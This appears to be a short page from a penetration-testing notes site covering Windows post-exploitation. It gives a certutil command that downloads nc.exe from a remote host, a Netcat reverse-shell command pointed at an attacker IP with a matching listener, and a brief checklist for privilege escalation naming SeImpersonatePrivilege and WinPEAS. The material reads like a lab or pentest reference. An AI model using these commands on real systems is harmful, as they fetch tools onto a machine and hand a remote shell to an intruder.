search

Utils

hashtag
1. File Transfer using certutil

Transfer a file from a remote server to the target machine:

certutil -urlcache -f http://10.10.31.2/nc.exe nc.exe

  • certutil is a built-in Windows utility that can be used for file transfers.

  • The -urlcache -f flag forces downloading the file from the specified URL.

  • nc.exe (Netcat) is saved to the local machine.

hashtag
2. Connect to Listener using Netcat

After transferring Netcat, establish a reverse shell:

nc.exe -nv 10.10.0.2 1234 -e cmd.exe

  • -n : No DNS resolution

  • -v : Verbose mode

  • 10.10.0.2 1234 : Attacker’s IP and port

  • -e cmd.exe : Executes a command shell on the target

Note: Ensure a Netcat listener is running on the attack machine:

nc -lvnp 1234

hashtag
3. Privilege Escalation Check

Run privilege checks to identify potential escalation paths:

  • Lists available privileges.

  • Look for SeImpersonatePrivilege, SeAssignPrimaryTokenPrivilege, etc.

Additional enumeration tools:

  • systeminfo: Gathers OS and patch details.

  • wmic qfe get ...: Lists installed updates.

For automated privilege escalation enumeration:

  • Use WinPEAS:

  • Use PrivescCheck:

PreviousIncognitoNextVirtualization

Last updated